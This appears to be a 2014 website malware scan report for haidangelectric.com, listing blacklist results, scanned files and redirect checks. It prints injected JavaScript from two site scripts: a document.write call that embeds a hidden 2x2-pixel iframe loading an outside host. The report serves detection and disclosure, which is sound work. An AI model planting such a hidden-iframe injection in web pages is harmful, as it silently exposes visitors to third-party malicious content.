Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=haidangelectric.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://haidangelectric.com/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://haidangelectric.com/ | 200 OK Content-Length: 28540 Content-Type: text/html | clean |
http://haidangelectric.com/js/jQuery/1.5.2/jquery.min.js | 200 OK Content-Length: 86089 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The scanner's excerpt is truncated: it opens with what appears to be ordinary jQuery library code and ends with the injected `document.write` call that emits the hidden iframe.
(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c==="none"||c==="")c="block";b_[a]=c}return b_[a]}function ce(a,b){var c={};d.each(cd.concat.apply([],cd.slice(0,b)),function(){c[this]=a});return c}function b$(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function bZ(){try{return new a.XMLHttpRequest}catch(b){}}function bY(){d document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=230459></iframe>');
Antivirus reports:
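Hidden iFrame found. size: 2x2 src: http://mikeritchie.net/showthread.php?sid=230459 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=230459> A 2x2-pixel frame is effectively invisible to the visitor, so the browser loads content from the third-party host with no visible sign on the page.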
http://download.skype.com/share/skypebuttons/js/skypeCheck.js | 200 OK Content-Length: 21434 Content-Type: application/x-javascript | clean |
http://haidangelectric.com/index.php?lang=en | 200 OK Content-Length: 5529 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?lang=vn | 200 OK Content-Length: 28540 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?option=com_contact | 200 OK Content-Length: 15232 Content-Type: text/html | clean |
http://haidangelectric.com/js/common.js | 200 OK Content-Length: 3714 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The scanner's excerpt is truncated: what appear to be the site's own form-validation helpers (IsNumeric, trim, IsEmail) are followed by the injected `document.write` call that emits the hidden iframe.
function IsNumeric(sText, sdot){
var ValidChars = "0123456789" + sdot; var IsNumber=true; var Char; var isDot = false; for (i = 0; i < sText.length && IsNumber == true; i++) { Char = sText.charAt(i); if (ValidChars.indexOf(Char) == -1 || (isDot && Char == sdot )) { IsNumber = false; } if(Char == sdot){ isDot = true; } } return IsNumber; } function trim(str } function IsEmail(value) { var email = document.getElementById('emailaddress'); var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if (!filter.test(value)) { return false; }else{ return true; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=230459></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mikeritchie.net/showthread.php?sid=230459 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=230459> This is the same iframe, with the same source URL, as the one reported for js/jQuery/1.5.2/jquery.min.js.
http://haidangelectric.com/js/function.php | 200 OK Content-Length: 1024 Content-Type: text/html | clean |
http://haidangelectric.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?option=com_download | 200 OK Content-Length: 28912 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?option=com_contentlist&type=about | 200 OK Content-Length: 12450 Content-Type: text/html | clean |
http://haidangelectric.com/index.php | 200 OK Content-Length: 28540 Content-Type: text/html | clean |
http://haidangelectric.com/skype:letruong6?chat | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?option=com_product&cat=1&subcat=7 | 200 OK Content-Length: 27394 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?option=com_product&cat=1&subcat=8 | 200 OK Content-Length: 12206 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: haidangelectric.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 10:36:09 GMT
Pragma: no-cache
Server: nginx admin
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 27 Aug 2014 10:36:09 GMT
Set-Cookie: sessioncookie=e17b247a696be2c7f5a0e712bb78904f; expires=Wed, 27-Aug-2014 22:36:09 GMT; path=/
Set-Cookie: PHPSESSID=b2ad186f0a904d5f298ffe6c2bbe0591; path=/
X-Cache: HIT from Backend
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: haidangelectric.com
Referer: http://www.google.com/search?q=haidangelectric.com
Result:
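The result is similar to the first query. No suspicious redirects were found. This check compares server responses only, so it does not cover the script-injected iframe reported under "Scanned pages/files".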